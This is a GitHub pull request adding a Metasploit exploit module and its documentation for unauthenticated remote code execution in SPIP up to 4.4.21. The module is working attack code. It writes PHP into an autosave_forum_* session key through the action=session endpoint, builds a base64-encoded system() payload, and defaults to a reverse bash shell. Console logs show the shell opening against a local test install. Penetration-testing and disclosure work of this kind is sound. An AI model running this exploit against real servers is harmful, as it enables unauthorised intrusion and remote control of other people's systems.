### PR TITLE
Add SPIP autosave session unauthenticated RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/spip_autosave_rce.md
+++ b/documentation/modules/exploit/multi/http/spip_autosave_rce.md
@@ -1,0 +1,70 @@
+ ## Introduction
+ Exploit unauthenticated remote code execution in SPIP via the forum autosave
+ session handler by storing PHP in an autosave_forum_* session key and
+ triggering template rendering.
+
+## Vulnerable Application
+
+This module exploits an unauthenticated RCE in SPIP <= 4.4.21 via the forum
+autosave session handler. The `action=session` endpoint allows any visitor to
+store arbitrary data in a PHP session variable. By writing PHP code into an
+`autosave_forum_*` session key, the code is executed by the template engine
+when the forum form page is rendered with the poisoned session.
+
+Requires a published article with public forums enabled.
+
+Affected versions: SPIP <= 4.4.21
+
+```
+wget https://files.spip.net/spip/archives/spip-v4.4.20.zip
+mkdir spip && mv spip-v4.4.20.zip spip
+cd spip && unzip spip-v4.4.20.zip
+php -S 0.0.0.0:8000
+```
+
+Navigate to `http://localhost:8000/ecrire` to complete installation. Enable
+public forums (Configuration > Interactivity > Forums) and publish an article.
+
+## Verification Steps
+
+1. Install SPIP <= 4.4.21 with forums enabled
+1. Start msfconsole
+1. Do: `use exploit/multi/http/spip_autosave_rce`
+1. Do: `set RHOSTS [ip]`
+1. Do: `set RPORT [port]`
+1. Do: `check`
+1. Verify the target is reported as vulnerable.
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### ARTICLE
+
+Path to a published article with public forums enabled. Defaults to
+`?article1`.
+
+## Scenarios
+
+```
+msf exploit(multi/http/spip_autosave_rce) > use exploit/multi/http/spip_autosave_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf exploit(multi/http/spip_autosave_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf exploit(multi/http/spip_autosave_rce) > set RPORT 8081
+RPORT => 8081
+msf exploit(multi/http/spip_autosave_rce) > check
+[*] SPIP Version detected: 4.4.20
+[+] 127.0.0.1:8081 - The target is vulnerable. PHP code executed via autosave session injection
+msf exploit(multi/http/spip_autosave_rce) > run
+[*] Started reverse TCP handler on 192.168.138.68:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] SPIP Version detected: 4.4.20
+[+] The target is vulnerable. PHP code executed via autosave session injection
+[*] Triggering payload execution...
+[*] Command shell session 7 opened (192.168.138.68:4444 -> 192.168.138.68:57208) at 2026-08-31 18:17:11 +0200
+id -nu
+
+jvoisin
+^C
+```

--- a/modules/exploits/multi/http/spip_autosave_rce.rb
+++ b/modules/exploits/multi/http/spip_autosave_rce.rb
@@ -1,0 +1,152 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Spip
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SPIP Autosave Session Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated RCE in SPIP <= 4.4.21
+          via the forum autosave session handler. The action=session
+          endpoint allows any visitor to store arbitrary data in a PHP
+          session variable. By writing PHP code into an autosave_forum_*
+          session key, the code is executed by the template engine when
+          the forum form page is rendered with the poisoned session.
+
+          Requires a published article with public forums enabled.
+        },
+        'Author' => [
+          'Julien Voisin' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-4-22.html']
+        ],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        # PHP payloads die when the HTTP request ends; meterpreter timeouts; a backgrounded shell command survives.
+        'DefaultOptions' => { 'WfsDelay' => 5, 'PAYLOAD' => 'cmd/unix/reverse_bash' }, # rubocop:disable Lint/ModuleDefaultPayload
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2026-08-30',
+        'Payload' => {
+          'BadChars' => "'\""
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('ARTICLE', [true, 'Path to article with public forum (e.g. ?article1)', '?article1'])
+    ])
+  end
+
+  def article_uri
+    article = datastore['ARTICLE']
+    if article.start_with?('/')
+      normalize_uri(target_uri.path, article)
+    else
+      article = article.delete_prefix('?')
+      "#{normalize_uri(target_uri.path, 'spip.php')}?#{article}"
+    end
+  end
+
+  def extract_autosave_hash
+    res = send_request_cgi('method' => 'GET', 'uri' => article_uri)
+    return nil unless res&.body
+
+    html = res.get_html_document
+    input = html.at_css('input[name="autosave"]')
+    input&.[]('value')&.match(/\Aforum_([a-f0-9]+)\z/)&.[](1)
+  end
+
+  def inject_autosave(hash, php_code, cookie: nil)
+    # val is parsed by SPIP as form-encoded key=value; the PHP code must be
+    # URI-encoded inside it so special chars don't break the parser. The
+    # framework's vars_post adds a second encoding layer for the HTTP body.
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'spip.php'),
+      'cookie' => cookie,
+      'vars_post' => {
+        'action' => 'session',
+        'var' => "autosave_forum_#{hash}",
+        'val' => "_hidden=#{Rex::Text.uri_encode(php_code)}"
+      }
+    )
+  end
+
+  def check
+    rversion = spip_version || spip_plugin_version('spip')
+    return CheckCode::Unknown('Unable to determine the version of SPIP') unless rversion
+
+    print_status("SPIP Version detected: #{rversion}")
+    return CheckCode::Safe("SPIP #{rversion} is not vulnerable") if rversion > Rex::Version.new('4.4.21')
+
+    hash = extract_autosave_hash
+    return CheckCode::Safe('No autosave forum form found on the target article') unless hash
+
+    marker = Rex::Text.rand_text_alpha(16)
+    res = inject_autosave(hash, "<?php echo '#{marker}'; ?>")
+    return CheckCode::Unknown('Failed to store session data') unless res
+
+    begin
+      cookie = res.get_cookies
+      res = send_request_cgi(
+        'method' => 'GET', 'uri' => article_uri, 'cookie' => cookie
+      )
+      return CheckCode::Unknown('Target did not respond') unless res
+
+      if res.body&.include?(marker)
+        CheckCode::Vulnerable('PHP code executed via autosave session injection')
+      else
+        CheckCode::Safe('PHP code was not executed')
+      end
+    ensure
+      inject_autosave(hash, '', cookie: cookie)
+    end
+  end
+
+  def exploit
+    hash = extract_autosave_hash
+    fail_with(Failure::NotVulnerable, 'No autosave forum form found') unless hash
+
+    b64 = Rex::Text.encode_base64("(#{payload.encoded}) &").delete("\n")
+    phped_payload = "@system('/bin/sh -c '.escapeshellarg(base64_decode('#{b64}')));"
+    php_code = "<?php #{phped_payload} ?>"
+
+    res = inject_autosave(hash, php_code)
+    fail_with(Failure::UnexpectedReply, 'Failed to store payload in session') unless res
+
+    begin
+      cookie = res.get_cookies
+      print_status('Triggering payload execution...')
+      send_request_cgi(
+        'method' => 'GET', 'uri' => article_uri, 'cookie' => cookie
+      )
+    ensure
+      inject_autosave(hash, '', cookie: cookie)
+    end
+  end
+end


### PR DESCRIPTION
## Description

Exploit unauthenticated RCE in SPIP <= 4.4.21 via the forum autosave session handler. The action=session endpoint lets any visitor store arbitrary PHP code in a session variable, which is then executed by the template engine when the article page is rendered.

Defaults to cmd/unix/reverse_bash because PHP payloads run inside the web server process and die when the HTTP request ends. A backgrounded system command survives independently.

Uses @system(base64_decode(...)) with & instead of php_exec_cmd because the latter's multi-method fallback chain either spawns duplicate shells (with &) or blocks and gets killed by the web server (without &). A single system() with backgrounding is the correct fire-and-forget pattern for this injection vector.

## Verification Steps

<!-- Provide specific, numbered steps a reviewer can follow to verify this change works as intended. At least one step must describe the expected observable outcome. Generic steps such as "verify it works" will result in the PR being closed. -->

1. - [ ] Download Spip via `wget https://files.spip.net/spip/archives/spip-v4.4.20.zip`
2. - [ ] Run `php -S 127.0.0.1:8080`
3. - [ ] Open `http://127.0.0.1:8080/ecrire` to install Spip, feel free to use sqlite as backend
4. - [ ] `use multi/http/spip_autosave_rce``
5. - [ ] `set RHOST 127.0.0.1`
5. - [ ] `set LHOST 127.0.0.1`
5. - [ ] `set RPORT 8080`
6. - [ ] `run`, and get a shell

## Test Evidence

```
msf exploit(multi/http/spip_autosave_rce) > use exploit/multi/http/spip_autosave_rce
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(multi/http/spip_autosave_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/spip_autosave_rce) > set RPORT 8081
RPORT => 8081
msf exploit(multi/http/spip_autosave_rce) > check
[*] SPIP Version detected: 4.4.20
[+] 127.0.0.1:8081 - The target is vulnerable. PHP code executed via autosave session injection
msf exploit(multi/http/spip_autosave_rce) > run
[*] Started reverse TCP handler on 192.168.138.68:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] SPIP Version detected: 4.4.20
[+] The target is vulnerable. PHP code executed via autosave session injection
[*] Triggering payload execution...
[*] Command shell session 7 opened (192.168.138.68:4444 -> 192.168.138.68:57208) at 2026-08-31 18:17:11 +0200
id -nu

jvoisin
^C
```
## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Fedora 44 |
| **Target Software/Hardware** |Spip 4.4.21 |


## AI Usage Disclosure

<!-- Was AI used in the creation of this PR? If so, describe what tools were used and how (e.g., code generation, documentation drafting, test writing). Write "None" if no AI tools were used. -->

"None"


## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [ ] Included RSpec tests for library changes _(encouraged for `lib/` changes)_
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

<!-- After the PR has been submitted, check on the GitHub Actions status and review the job for any failures (red-X marks). Resolve these issues as they will be flagged by review. -->

<details>
<summary>Hardware and Complex Software Module Guidance</summary>

If your module targets specialized hardware (routers, IoT, PLCs, etc.) or complex software (licensed, multi-service, or multi-version), provide a pcap, screen recording, or video showing successful execution.

Email sanitized pcaps/recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com) — remove real IPs, credentials, and hostnames before sending. If hardware/software is unavailable, explain in the PR description.

</details>

<details>
<summary>Responsiveness and PR Takeover Policy</summary>

We want every contribution to make it into the project. If approximately 2 weeks pass after a review request without a comment or code update from you, the team may take over the PR and complete the work on your behalf.

If this happens, you will remain credited as a co-author on the final commit — your contribution is always recognized.

This policy exists to keep the project moving forward. It is not a reflection on the quality of your work or your involvement. Life happens, and we would rather finish the work together than let a good contribution go stale.

</details>
